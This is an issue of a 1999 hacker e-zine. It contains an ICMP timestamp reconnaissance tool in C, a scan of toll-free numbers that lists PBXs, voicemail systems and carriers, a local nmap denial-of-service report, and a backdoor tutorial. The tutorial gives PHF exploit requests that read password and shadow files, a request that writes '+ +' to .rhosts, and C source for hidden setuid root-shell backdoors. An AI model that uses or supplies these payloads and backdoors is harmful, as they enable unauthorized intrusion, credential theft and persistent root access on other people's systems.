[ http://darkcyde.system7.org ] [ http://hybrid.dtmf.org ] yyyyyssssyyyy yyyyssssyyyy yyyy yyyy |lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy :|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$ :||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$ :::|l ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS ::::| $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l .:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::| [ f41th issue 7 - July 1999 ] [ f41th magazine is a production of D4RKCYDE ] [ submissions: hybrid@dtmf.org downtime@webcrunchers.com ] [ mailto: hybrid@dtmf.org downtime@webcrunchers.com ] [ #darkcyde efnet ] PURE FE4R OOO-(z}-|[ F41th 7 Editorial ]--( hybrid )--{z)-|[OOO OOO-(Z}-|[ Chronus ICMP Packet Timestamps ]--( rwxrwxrwx )--{Z)-|[OOO OOO-(z}-|[ US 18OO Random Scan ]--( force )--{z)-|[OOO OOO-(Z}-|[ Local? Linux DoS using nmap ]--( gov-boi )--{Z)-|[OOO OOO-(z}-|[ Impementing Backdoors ]--( msinister )--{z)-|[OOO OOO-(Z}-|[ UK Carrier Scan of O8OO917[XXXX] ]--( faith )--{Z)-|[OOO OOO-(z}-|[ Qpop Trojan Installer ]--( gov-boi )--{z)-|[OOO OOO-(Z}-|[ Rolling Deep ]--( tgb )--{Z)-|[OOO OOO-(z}-|[ 5ESS Compact Digital Exchanges ]--( hybrid )--{z)-|[OOO OOO-(Z}-|[ UK Scan of Exchange O8OO672[XXX] ]--( faith )--{Z)-|[OOO OOO-(z}-|[ SUIDcyde Bugtraq Review ]--( bodie )--{z)-|[OOO OOO-(Z}-|[ DoD Communication networks DMS ]--( hybrid )--{Z)-|[OOO OOO-(z}-|[ ICQ Conspiracy ]--( camel )--{z)-|[OOO OOO-(Z}-|[ Pearl Programming ]--( zomba )--{Z)-|[OOO ----------------------------------------------------------------------- D4RKCYDE [hybrid] [downtime] [zomba] [force] * #darkcyde EfNet (no lamerz) [shadowx] [elf] [msinister] [shylock] * http://darkcyde.system7.org [lowtek] [digiphreq] [bodie] [sintax] * hybrid@dtmf.org [nino] [microwire] * downtime@webrunchers.com SHOUTZ [b4b0] [9x] [ch1ckie] [extriad] [kraise] [sonicborg] [jasun] [aktiver] [knight] [siezer] [oeb] [skyper] [typeo] [tgb] [camel] [gov-boi] [rwx] [monty] [phace] [psyclone] [vixen] [port] [mranon] [w1rep41r] [oclet] [l0r1] [ginger] [tip] [milkman] [ph1x] [gr1p] [prez] [network] [lewp] [xio] [backa] [loco] [thewombat] [jd] [spacity] [bind] [lusta] [subzz] [skalar] [voltage] [simmeth] [kryptus] [pbxphreak] [gb] [smiler] [jorge] ----------------------------------------------------------------------- [hybrid-] the king of idle has arrived. *[JaSuN]* Beer, Sand, Rollercoasters, Computers and Communications." hybrids dog pissed on me i'll kill that shitty thing someone give me a quote i cant put at the top of f41th 7 "there can be only one" <[JaSuN]> blasted from the past, out into the future <[JaSuN]> heh <[JaSuN]> "Whats the Infoz? <[JaSuN]> "Gimme the Infoz? elvis has left the building *** ani_slut has quit IRC (Read error: 0 (Error 0)) "30 million nerds communicating with people they don't know, about things they don't understand, for reasons they can't explain." -- Guy Kawasaki, Apple Computer "I have yet to see any pornography on the Internet....mainly because I'm not looking for it. If you're finding for it, you're looking for it. Either quit looking for it or quit complaining about your sucess." -- Don Shorock Usenet is like a herd of performing elephants with diarrhea -- massive, difficult to redirect, awe-inspiring, entertaining, and a source of mind-boggling amounts of excrement when you least expect it. -- Author unknown -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Editorial ]::::::::::::[OO--[ by hybrid ]---[ hybrid@dtmf.org ]:::: -->[OO]:::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]::::::::::::: Welcome to f41th 7. I can't believe that we have managed to get 3 issues of f41th out in 1 month, getting a zine together is not easy work, it takes alot of time to write the idividual articles in the issue, I'd like to say thanks to everyone that has contributed to this issue and previous issues of f41th.. It's getting better all the time, keep the articles rolling in :) On another note, we have noticed a higher level of .gov and .mil hits on the darkcyde f41th distro sites. For example.. shepherd.hurlburt.af.mil - - [07/Jun/1999:16:49:39 -0500] "GET faith6.txt gw.assist.mil - - [08/Jun/1999:11:33:31 -0500] "GET faith6.txt coni-68.conicit.gov.ve - - [07/Jun/1999:10:26:58 -0500] "GET faith6.txt gsnmail.gov.tw - - [07/Jun/1999:13:57:46 -0500] "GET faith6.txt irmbb66.nigms.nih.gov - - [07/Jun/1999:16:54:49 -0500] "GET faith6.zip operations.dera.gov.uk - - [12/Jun/1999:00:06:28 -0500] "GET faith6.txt dera.gov.uk strikes fjear, goto www.dera.gov.uk to take a look. We've also had hits from various telcos such as Cable&Wireless, and US RBOCs such as USWest and other BELL*.*'s. According to alot of people I have spoken to, dera.gov.uk regualy visit hp sites, and probably database them all.. However, if they wanna read f41th it's upto them, we're not complaining. Sinse the last issue I've noticed alot of servers are mirroring the f41th archives, I'd like to ask if you want to mirror our zine please email me or another darkcyde member so we can list you in the f41th mirrors list. If you want to submit anything to f41th, please email us or me, or comto #darkcyde EFNET, /dcc send hybrid 0d4yz.txt .. peace, enjoy the issue, take it easy. hybrid. -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Chronos ]:::::::[OO--[ by rxwrwxrwx ]---[ rwxrwxrwx@soldier.net ]:: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Chronos ------- Chronos is a tool that can be used to measure the degree of synchronization between hosts. It uses ICMP Timestamp packets to ask those hosts for their actual times (with microsecond precision). Some real-world applications for Chronos include checking whether your NTP- enabled machines are working as expected or not. Also time differences between certain hosts can be dangerous from a security point of view: `slight' delays (in the range or minutes or even less depending on the load of the network/servers) can make it a real pain when tracking things down in logs from those hosts. Another (maybe more useful) way of using chronos is to aid in remotely determining certain characteristics of network topologies like knowing if several different IP addresses correspond to the same physical machine. for example: Non-authoritative answer: Name: random.isp.net Address: 207.201.167.77 Non-authoritative answer: Name: some.ip.alias.of.random.isp.net Address: 209.170.47.7 # ./chronos -l 192.168.1.13 -s 0 -u 500000 207.201.167.77 209.170.47.7 Chronos - measures synchronization between hosts (c) 1999 by 777 Fasten your seat belts, this is gonna hurt!! host == 207.201.167.77 id == 0, seq == 30526, icmp_ttime == 36715519 host == 209.170.47.7 id == 0, seq == 10405, icmp_ttime == 36715522 host == 207.201.167.77 id == 1, seq == 25611, icmp_ttime == 36715852 host == 209.170.47.7 id == 1, seq == 58905, icmp_ttime == 36715970 host == 207.201.167.77 id == 2, seq == 33126, icmp_ttime == 36716350 host == 209.170.47.7 id == 2, seq == 1421, icmp_ttime == 36716460 host == 207.201.167.77 id == 3, seq == 46280, icmp_ttime == 36716851 host == 209.170.47.7 id == 3, seq == 44840, icmp_ttime == 36716854 host == 207.201.167.77 id == 4, seq == 60411, icmp_ttime == 36717350 host == 209.170.47.7 id == 4, seq == 63000, icmp_ttime == 36717460 host == 207.201.167.77 id == 5, seq == 60383, icmp_ttime == 36717850 host == 209.170.47.7 id == 5, seq == 12962, icmp_ttime == 36717853 --- statistics --- These are synchronized. We assume the IP addresses do, in fact, correspond to the same physical machine (which is true for this example) thus allowing us to narrow things down to the key servers of a network. another example: Name: example.com Addresses: 197.77.140.5, 197.77.140.6 Aliases: www.example.com # ./chronos -l 192.168.1.13 -s 0 -u 500000 195.77.240.5 195.77.240.6 Chronos - measures synchronization between hosts (c) 1999 by 777 Fasten your seat belts, this is gonna hurt!! host == 197.77.140.5 id == 0, seq == 5450, icmp_ttime == 44024897 host == 197.77.140.6 id == 0, seq == 55100, icmp_ttime == 36591075 host == 197.77.140.5 id == 1, seq == 24786, icmp_ttime == 44025375 host == 197.77.140.6 id == 1, seq == 35820, icmp_ttime == 36591565 --- statistics --- As you can see these are obviously not in-sync. The code presented here is just a proof of concept and lacks some key routines (like automagickally analysing the results), but it demonstrates the technique. Chronos/Makefile100644 0 0 732 6732275270 12204 0ustar rootroot# Makefile CC = gcc CFLAGS = -D_REENTRANT -Wall -O3 -funroll-loops -finline-functions LIBS = -lpthread OBJS = main.o tstamp.o engine.o stats.o all: chronos chronos: $(OBJS) $(CC) $(CFLAGS) -o chronos $(OBJS) $(LIBS) main.o: main.c engine.h $(CC) $(CFLAGS) -c main.c tstamp.o: tstamp.c tstamp.h $(CC) $(CFLAGS) -c tstamp.c engine.o: engine.c engine.h $(CC) $(CFLAGS) -c engine.c stats.o: stats.c stats.h $(CC) $(CFLAGS) -c stats.c clean: rm -f core chronos *.o Chronos/engine.c100644 0 0 4703 6732274545 12203 0ustar rootroot/* [ e n g i n e . c ] Handles the setting up of timers and scheduling of threads Version: $Id: engine.c,v 1.7 1999/04/28 15:04:18 coder Exp coder $ (c) 1999 by 777 */ #include #include #include #include #include #include #include #include #include #include "engine.h" #include "tstamp.h" int iters = -1; /* number of times we've queried all the hosts */ static void spawn_threads(int signum); static void launch_it(void *arg); int init_timer_interrupt(void) { struct sigaction act; memset(&act, 0, sizeof(act)); act.sa_handler = spawn_threads; act.sa_flags = SA_RESTART; if (sigaction(SIGALRM, &act, NULL) == -1) return -1; else return 0; } int setup_timer(time_t secs, time_t usecs) { struct itimerval timer; timer.it_interval.tv_sec = secs; timer.it_interval.tv_usec = usecs; timer.it_value = timer.it_interval; if (setitimer(ITIMER_REAL, &timer, NULL) == -1) return -1; else return 0; } static void spawn_threads(int signum) { u_int i; int retval; pthread_t worker_tid[nthreads]; pthread_attr_t worker_attr; printf("\n"); ++iters; /* We set our threads' scheduling policy so that they run in realtime and make them detached by default since we don't need their return values */ if (pthread_attr_init(&worker_attr) != 0) { fprintf(stderr, "pthread_attr_init failed\n"); exit(-1); } if (pthread_attr_setdetachstate(&worker_attr, PTHREAD_CREATE_DETACHED) != 0) { fprintf(stderr, "pthread_attr_setdetachstate failed\n"); exit(-1); } if (pthread_attr_setschedpolicy(&worker_attr, SCHED_RR) != 0) { fprintf(stderr, "pthread_attr_setschedpolicy failed\n"); exit(-1); } for (i = 0; i < nthreads; i++) { if ((retval = pthread_create(&worker_tid[i], &worker_attr, (void *) &launch_it, (void *) i)) != 0) { fprintf(stderr, "pthread_create failed\n"); if (retval == EAGAIN) continue; exit(-1); } } if (pthread_attr_destroy(&worker_attr) != 0) { fprintf(stderr, "pthread_attr_destroy failed\n"); exit(-1); } } void launch_it(void *arg) { u_short seqnum; struct timeval tv; gettimeofday(&tv, NULL); srand(tv.tv_usec); seqnum = (rand() % USHRT_MAX); if (timestamp(dest[(u_int) arg], iters, seqnum) == 0) fprintf(stderr, " host == %-15s\tid == %5u, seq == %5u, icmp_ttime == %9s\n", dest[(u_int) arg], (u_short) iters, seqnum, "*failed*"); pthread_exit(NULL); } Chronos/engine.h100644 0 0 1022 6732274571 12176 0ustar rootroot#ifndef _ENGINE_H #define _ENGINE_H /* [ e n g i n e . h ] Handles scheduling of threads and timers Version: $Id: engine.h,v 1.4 1999/04/28 15:04:22 coder Exp coder $ (c) 1999 by 777 */ #include #include #include u_int nthreads; /* number of concurrent working threads */ u_char **dest; /* array with addesses of destination hosts */ extern int init_timer_interrupt(void); extern int setup_timer(time_t secs, time_t usecs); #endif /* _ENGINE_H */ Chronos/in_cksum.c100644 0 0 1107 6711625424 12532 0ustar rootroot/* [ i n _ c k s u m . c ] Version: $Id: in_cksum.c,v 1.1 1999/04/23 17:13:43 coder Exp $ */ #include int in_cksum(u_short *p, int n) { register u_short answer; register long sum = 0; u_short odd_byte = 0; while (n > 1) { sum += *p++; n -= 2; } /* mop up an odd byte, if necessary */ if (n == 1) { *(u_char *) (&odd_byte) = *(u_char *) p; sum += odd_byte; } sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = (int)~sum; /* ones-complement, truncate*/ return (answer); } Chronos/in_cksum.h100644 0 0 346 6711625170 12521 0ustar rootroot#ifndef _IN_CKSUM_H #define _IN_CKSUM_H /* [ i n _ c k s u m . h ] Version: $Id: in_cksum.h,v 1.3 1999/04/23 13:52:35 coder Exp $ */ #include "in_cksum.c" extern int in_cksum(u_short *p, int n); #endif /* _IN_CKSUM_H */ Chronos/main.c100644 0 0 4475 6732275243 11664 0ustar rootroot/* [ m a i n . c ] Glues it all together. Version: $Id: main.c,v 1.1 1999/04/24 16:55:55 coder Exp coder $ (c) 1999 by 777 usage: # ./chronos -l 192.168.1.111 -s 0 -u 500000 `nmap -sP -PI network/24 \ | grep "Host" | cut -f 2 -d '(' | grep "appears to be up" | cut -f 1 -d ')'` */ #include #include #include #include #include #include #include #include "engine.h" #include "stats.h" #include "main.h" extern u_int nthreads; extern u_char **dest; static void usage(char *name); static void banner(void); int main(int argc, char *argv[]) { int i, c; u_char *local_ip = NULL; time_t secs = 1, usecs = 0; /* default interval set to 1 second */ if (geteuid() != 0) fprintf(stderr, "Sorry, you don't have permissions to run this program\n"), exit(-1); if (argc < 2) usage(argv[0]), exit(-1); while((c = getopt(argc, argv, "l:s:u:")) != -1) { switch (c) { case 'l': /* local ip address */ local_ip = strdup(optarg); break; case 's': /* seconds */ secs = strtoul(optarg, NULL, 10); break; case 'u': /* microseconds */ usecs = strtoul(optarg, NULL, 10); break; } } if (inet_aton(local_ip, &local_addr) == -1) perror("inet_aton"), usage(argv[0]), exit(-1); free(local_ip); nthreads = argc - optind; /* copy each ip address passed as command line parameter into an array (which we firstly allocate) */ if ((dest = (u_char **) calloc(nthreads, sizeof(u_char *))) == NULL) perror("calloc"), exit(-1); for (i = 0; i < nthreads; i++) dest[i] = strdup(argv[optind + i]); banner(); if (init_break_interrupt() == -1) fprintf(stderr, "Couldn't setup SIGINT handler\n"), exit(-1); if (init_timer_interrupt() == -1) fprintf(stderr, "Couldn't setup SIGALRM handler\n"), exit(-1); printf("Fasten your seat belts, this is gonna hurt!!\n"); if (setup_timer(secs, usecs) == -1) fprintf(stderr, "Couldn't setup timer\n"), exit(-1); for ( ; ; ); free(dest); exit(0); } void usage(char *name) { banner(); fprintf(stderr, "usage: %s -l [-s ] [-u ] [destination 2] [destination 3] ...\n", name); } void banner(void) { printf("Chronos - measures synchronization between hosts\n"); printf("(c) 1999 by 777 \n"); } Chronos/main.h100644 0 0 517 6711705462 11640 0ustar rootroot#ifndef _MAIN_H #define _MAIN_H /* [ m a i n . c ] Glues it all together. Version: $Id: main.c,v 1.1 1999/04/24 16:55:55 coder Exp coder $ 1999 by 777 */ #include #include #define ARGSIZE (strlen(argv[optind + i]) + 1) struct in_addr local_addr; #endif /* _MAIN_H */ Chronos/stats.c100644 0 0 1360 6732275154 12065 0ustar rootroot/* [ s t a t s . c ] Deals with the analysis and display of the results Version: $Id: stats.c,v 1.1 1999/04/28 15:04:37 coder Exp coder $ (c) 1999 by 777 */ #include #include #include #include #include "engine.h" #include "main.h" static void analyse(int signum); static void show_results(void); int init_break_interrupt(void) { struct sigaction act; memset(&act, 0, sizeof(act)); act.sa_handler = analyse; act.sa_flags = SA_ONESHOT | SA_NOMASK; if (sigaction(SIGINT, &act, NULL) == -1) return -1; else return 0; } static void analyse(int signum) { show_results(); exit(EXIT_SUCCESS); } static void show_results(void) { printf("\n--- statistics ---\n"); } Chronos/stats.h100644 0 0 437 6732275171 12055 0ustar rootroot#ifndef _STATS_H #define _STATS_H /* [ s t a t s . c ] Deals with the analysis and display of the results Version: $Id: stats.h,v 1.1 1999/04/28 15:04:41 coder Exp coder $ (c) 1999 by 777 */ extern int init_break_interrupt(void); #endif /* _STATS_H */ Chronos/tstamp.c100644 0 0 6205 6732274437 12245 0ustar rootroot/* [ t s t a m p . c ] Sends an ICMP Timestamp request and reads the reply Version: $Id: tstamp.c,v 1.10 1999/04/28 15:04:44 coder Exp coder $ (c) 1999 by 777 */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "in_cksum.h" #include "tstamp.h" #include "main.h" #define IPHDRSIZE sizeof(struct iphdr) extern struct in_addr local_addr; /* we get this from main.h */ /* sends dst an icmp timestamp request and returns the reply or 0 if it failed */ u_int32_t timestamp(char *dst, u_short id, u_short seq) { int sockfd; struct sockaddr_in src_sa, dst_sa; struct icmp *icmp; struct in_addr dst_addr; char buf[IPHDRSIZE + ICMP_TSLEN]; /* this is the maximum size we'll ever need */ int buflen; /* We open a raw ICMP socket, after that we bind() it to the source address and connect() it to the destination address. Thus we enforce that the kernel passes to the socket only ICMP packets which match the relevant addresses. It also explains why we use send() and recv() instead of sendto() and recvfrom() (we're dealing with connected sockets) */ if ((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) return 0; if (!(inet_aton(dst, &dst_addr))) { close(sockfd); return 0; } memset(&src_sa, 0, sizeof(struct sockaddr_in)); memset(&dst_sa, 0, sizeof(struct sockaddr_in)); src_sa.sin_family = dst_sa.sin_family = AF_INET; /* we have to explicitly bind our socket to a specific address instead of INADDR_ANY in order to receive correctly icmps sent to aliases ips of ours */ src_sa.sin_addr = local_addr; dst_sa.sin_addr = dst_addr; if (bind(sockfd, (struct sockaddr *) &src_sa, sizeof(struct sockaddr_in)) == -1) { perror("bind"); close(sockfd); return 0; } if (connect(sockfd, (struct sockaddr *) &dst_sa, sizeof(struct sockaddr_in)) == -1) { perror("connect"); close(sockfd); return 0; } /* Next, ICMP Timestamp-request header is built and sent */ memset(buf, 0, sizeof(buf)); icmp = (struct icmp *) buf; icmp->icmp_type = ICMP_TSTAMP; icmp->icmp_code = 0; icmp->icmp_cksum = 0; icmp->icmp_id = id & 0xffff; icmp->icmp_seq = seq & 0xffff; icmp->icmp_otime = (u_int32_t) time(NULL); icmp->icmp_cksum = in_cksum((u_short *) icmp, ICMP_TSLEN); if (send(sockfd, buf, ICMP_TSLEN, 0) == -1) { perror("send"); close(sockfd); return 0; } /* Now it's time to read the reply */ memset(buf, 0, sizeof(buf)); buflen = IPHDRSIZE + ICMP_TSLEN; if (recv(sockfd, buf, buflen, 0) > 0) { icmp = (struct icmp *) (buf + IPHDRSIZE); if ((icmp->icmp_type == ICMP_TSTAMPREPLY) && (icmp->icmp_id == (id & 0xffff)) && (icmp->icmp_seq == (seq & 0xffff))) printf(" host == %-15s\tid == %5u, seq == %5u, icmp_ttime == %9u\n", dst, id, seq, ntohl(icmp->icmp_ttime)); else { close(sockfd); return 0; } } else { close(sockfd); return 0; } id++; seq++; close(sockfd); return (ntohl(icmp->icmp_ttime)); } Chronos/tstamp.h100644 0 0 644 6732274477 12237 0ustar rootroot#ifndef _TSTAMP_H #define _TSTAMP_H /* [ t s t a m p . h ] Sends an ICMP TimeStamp request and handles the reply Version: $Id: tstamp.h,v 1.5 1999/04/27 14:16:04 coder Exp $ (c) 1999 by 777 */ #include /* sends dst an icmp timestamp request and returns the reply or 0 if it failed */ extern u_int32_t timestamp(char *dst, u_short id, u_short seq); #endif /* TSTAMP_H */ -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ 18OO scan ]::::::::[OO--[ by force ]---[ force007@hotmail.com ]:::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 18oo scan by force telco... --oOo--- 622-7380 pbx at&t system network control centre maintanence group 574-6369 mci worldcom paging system 654-3211 us watts enter authorisation code 982-7144 pbx some telco access system 472-1175 v south westen bell 982-7147 pbx north-tech of mci worldcom 829-0030 v mci 829-0026 fax/carrier 220-4818 v mci metro 786-9445 conference calling centre 475-4455 v conf centre passcode please [1-888] 622-6823 pbx at&t service and maintanence single point number [1-888] 333-0879 conf centre carriers... --oOo------ 535-2648 carrier wouldn't connect 567-1745 carrier 232-1249 carrier 232-1968 carrier 232-1863 carrier 599-0262 carrier 599-0861 carrier? continuos carrier/fax tone 599-0477 carrier/fax 599-0298 carrier 321-2403 carrier 321-7468 carrier 321-1542 carrier 321-1173 carrier 321-8619 carrier 321-3756 carrier 321-2780 carrier? weird tone 321-5352 carrier vmbs... --oOo-- 232-1279 vmb lots of options 232-1765 vmb 321-0103 vms mm k-mart resource centre 321-2566 pbx vms dell micro products 321-6909 vms mm 321-8691 pbx vms 466-9222 octel direct 331-1025 vms minneapolis police and fire 2O8-9996 227-O8OO 231-1OOO 285-3222 285-6399 322-5889 345-6323 418-2292 423-585O 433-6245 455-115O 456-1188 466-53OO 466-9222 476-2O44 539-5488 577-9997 667-8424 685-391O 72O-9OO4 72O-9O22 726-2363 746-7766 777-1495 777-17O8 777-6266 777-9633 792-272O 829-OO17 858-3651 868-5995 887-OO11 966-9996 tones... --oOo--- 535-2682 dialtone 321-6228 dialtone [you have dialled an invalid account code] 535-2151 dialtone 232-1777 dialtone [dialled 1800 and it rings somewhere] 232-1282 dialtone [dialled 1800 and it rang a residential number?] 321-6935 dialtone [you have dialled an invalid account code] 321-8593 dialtone 232-1243 beepboop tone 232-1198 beepboop tone 232-1922 beepboop tone 321-6891 beepboop tone 321-0301 beepboop tone 321-5963 beepboop tone 321-9002 beepboop tone 535-2361 tone 535-2456 weird siren tone other... --oOo--- 535-2056 na 837-4391 rec unable to answer at present please try later force... --oOo--- force007@hotmail.com uk vmb o8oo 919355 us vmb 18oo 331o17, 6, 4328 'my middle finger won't go down, how do i wave?' -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ nmap DoS ]::::::::[OO--[ by gov-boi ]---[ hotmetal@hack.co.za]::::: -->[OO]:::::::::::::::::::::::::::::::[ http://www.hack.co.za ]:::::::::::::: subject: (local?) linux DoS using nmap Good day.. I appologize if this is old but seems still to be working/active on my own server. (slackware 4.0.0). I would be interested to know which other distro's this works against. Tested against: slackware 4.0.0 debian 2.1 Redhat 6.0 I became aware of this when local users begun to launch DoS attacks. kernel:~$ nmap 127.[0-255].[0-255].[0-255] -p 21 -sT Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on localhost (127.0.0.1): Port State Protocol Service 21 open tcp ftp Interesting ports on (127.0.0.2): Port State Protocol Service 21 open tcp ftp and it keeps going untill the +/-280th packet.. Interesting ports on (127.0.1.32): Port State Protocol Service 21 open tcp ftp No ports open for host (127.0.1.33) No ports open for host (127.0.1.34) No ports open for host (127.0.1.35) etc.. etc.. I havent tested it on remote machines, but this looks like a tcp/syn flood? Anyhow, local users can shutdown any local daemon running on any port. (apache was the only service that remaining running.) The rest of the other services became unusable/(dead?). Any ideas how one could prevent this? Sorry again if this is old. Regards hotmetal of (src) hotmetal@hack.co.za ( www.hack.co.za ) (e x p l o i t m a t r i x) (world domination in progress) -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Backdoors ]::::::::::::[OO--[ by msinister ]---[ ]:::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: <><><><><><><><><><><><><><><><><> <> <> <> BACK DOORS AND HOW TO <> <> GET ROOTS FROM A NON <> <> ROOTSHELL <> <> <> <> BY: MISTER - SINISTER <> <> <> <><><><><><><><><><><><><><><><><> berfore startin the articale i would to thnk very much to: f0x malder! the leetest hacker/programer i know in the world! (and dont argue!) BACKDOORS: Since hackers have breaked in into systems they wanted to OWEN them meanin: to have access all the time to the system and not havin to hack it every time they want to get in and get root. there are many types of backdoor and i'll discus some of them here and will (hopefuly) show you the reader some ways of makin them and getin root from a simple user shell in some sytem. PASSWORD DOORS A way of gainin access is to get the /etc/passwd or /etc/shadow file and tryin to crack it those givin u the abilty to telnet into the system and enterin as a root. if you have a shell in the system and u do have the prometion to read the file (passwd or shadow) then congrats u have got a new root just take the (with your mouse dont copy the file) root line for example: root:tJWOCaNGtQAtI:0:0:Super-User:/:/usr/local/bin/bash and run on it some kind of a passwd cracker there are alot of this over the internet i'm sure you can find out one. an other way of gainin the PASSWD file is via the knowen bug PHF (it still exist }:) so lets say you have found an host the has PHF and u wanna use it well via PHF u arent exactly root but u have enough to get your hands on the /etc/passwd or /etc/shadow file (not allways but still there is a chance) so here is how you do it: GET /cgi-bin/phf?Qalias=x%0aeval%20cat%20/etc/passwd this line will do this (if u were a user in the system) 14:21 ~root@SINISTER /root [10]# cat /etc/passwd and this line will do this on the system: GET /cgi-bin/phf?Qalias=x%0aeval%20cat%20/etc/shadow 14:21 ~root@SINISTER /root [10]# cat /etc/shadow now after u have gotten the passwd file u know how to gain a root access so here is our first root (hopefuly) THE '+ +' IN .rhosts ROOT here is another way of gainin root also via PHF (or if u have any other way to tryin and echo '+ +' to the .rhosts file) the '+ +' means every one could rlogin into the system with out any passwds (nice heh?) well here is how to do it via PHF: GET /cgi-bin/phf?Qalias=x%0aeval%20echo%20'%2b%20%2b'%20>%20.rhosts this line is equivlent to 14:21 ~root@SINISTER /root [12]# echo '+ +' > .rhosts and if u have managed to echo it then u got a new root all u have to do now is to rlogin into the host (i'm sure u know after u are root in the system what to do :) TELNET BACKDOORS: A telnet backdoor allows to telnet as a root right away when u telnet to a host the inetd listens to the port and then receives the connection and then passes it to in.telnetd and then opens the program login. when doin this the machine checks for things like type of the term (usaly VT100) and then requires authentication hackers have changed it that no authentication will be needed (pretty cool heh?) CRONJOB BACKDOORS A realy cool way of breakin into a system is to tell the crontab to a run a program at a certain time and then u can get into the system for example: 14:36 ~root@SINISTER /root [18]# crontab -l # If you don't want the output of a cron job mailed to you, you have to direct # any output to /dev/null. We'll do this here since these jobs should run # properly on a newly installed system, but if they don't the average newbie # might get quite perplexed about getting strange mail every 5 minutes. :^) # # Run the 'atrun' program every 5 minutes # This runs anything that's due to run from 'at'. See man 'at' or 'atrun'. 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /usr/lib/atrun 1> /dev/null 2> /dev/null # This touches a filename in the temp directory so that you can see cron #is # working if the timestamp is current. Comment it out if it bugs you. :^) # * * * * * touch /tmp/.crond_running we can see that my crontab runs every five minutes a program called 'atrun' into /dev/null in the same way we can tell to the hacked host to run every day at a specific time a program that opens all ports (just a dumb example but u know where i'm gettin to :) HOW TO MAKE A BACKDOOR well now that u know a litle (realllllllly lil) about backdoors lets try to make one our self. here is a simple (probebly useles) but it might some time work :) main() { if (getuid() == /* here enter your UID */) { setuid(0); setgid(0); system("/bin/csh") /* i like C shell more then bash */ } } as u can see what u have told to the computer to do is this: if the user id is mine then plz change my user id and gimme root :) (arent we modest in our requests :) this file should compile on any system but not the same of gettin root :( since it doesnt require any passwd or anythin else it would be a great idea to hide it . (this method is only if u have a shell in a system) lets say i have goten a shell and i want to get root and i also want a passwd ? ok this can be arranged to :) here is an example for a more sufisticated backdoor: main(int argc, char *argv[]) { if (argc != 2) { printf("usage: %s file name\n", argv[0]); exit(1); } /* lets stop here and analyze waht we have dont. * incase the root finds out this file and wants to check it and will type * the name of the file that gives us root all he will get is * > usage: [the name that u called your backdoor] file name * here is a tip dont call your file backdoor :) * ok lets go on with the program */ if (!strcmp(argv[0],"/* enter here your passwd */")) { setuid(0); setgid(0); system("/bin/csh"); } else printf("%s : %s file has been backed!\n", argv[0], argv[1]); } lets see what this will do 14:57 ~Sinister@SINISTER /home/Sinister [26]> gcc -o back backdoor.c 14:57 ~Sinister@SINISTER /home/Sinister [27]> back usage : back file name 14:57 ~Sinister@SINISTER /home/Sinister [28]> back [i entered here the passwd i choosed] #id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) # exit 15:02 ~Sinister@SINISTER /home/Sinister [29]> now lets say the root wants to try it on a file he will allways get this (doesnt matter if the file exist or doesnt exist) 15:02 ~Sinister@SINISTER /home/Sinister [29]>back backdoor.c back : backdoor.c file has been backed! 15:03 ~Sinister@SINISTER /home/Sinister [30]> nice (kinda) if you have more colorful msges to the root like > back /etc/passwd ok dear root u found my back door > then feel free to change :) ok now that we have made a simple backdoor lets go and make somthin nice with a passwd that doesnt shows main(int argc, char *argv[]) { chat PASS[7]; bzero(7,PASS); PASS[0] = 'a'; PASS[1] = 'b'; PASS[2] = 'c'; PASS[3] = 'd'; PASS[4] = 'e'; PASS[5] = 'f'; PASS[6] = 'g'; PASS[7] = 'h'; if (argc != 2) { printf("usage: %s file name\n", argv[0]); exit(1); } if(!strcmp(argv[1], PASS)) { setuid(0); setgid(0); system("/bin/csh"); } else printf (%s : %s file has been backed!\n"); } what we have made is we took our old backdoor and entered an array that holds 8 charcters and (u can change it into more but i think 8 is enough) in this program our passwd is 'abcdefgh' and puted zero's on them using the bzero function those hiding the pass. lets see what does it do: 15:09 ~Sinister@SINISTER /home/Sinister [2]# gcc -o back back.c 15:09 ~Sinister@SINISTER /home/Sinister [3]# back usage: back file name 15:09 ~Sinister@SINISTER /home/Sinister [4]# back abcdefgh #exit 15:09 ~Sinister@SINISTER /root [5]# back back.c back : back.c file has been backed ! 15:09 ~Sinister@SINISTER /home/Sinister [6]# works nice heh? well thats is all for this articale (sux doesnt it :( COMMENT for those who want my cool hand made prompt it is also colorful :) and it is only colorful if u use csh or tcsh shells here it is :) "%S%T%s %U%B~$USER@%m%b%u %B%/%b %U[%h]%u%B%#%b" nice heh ? (well i dont care what u think i like it ! :) till next time have a nice day and enjoy your self see ya later! 11/6/99 -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ O8OO917[XXXX] ]:::::::::::::[OO--[ by faith ]---[ ]:::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::[ http://darkcyde.system7.org ]:::::::: __________ ____________________ ________ << 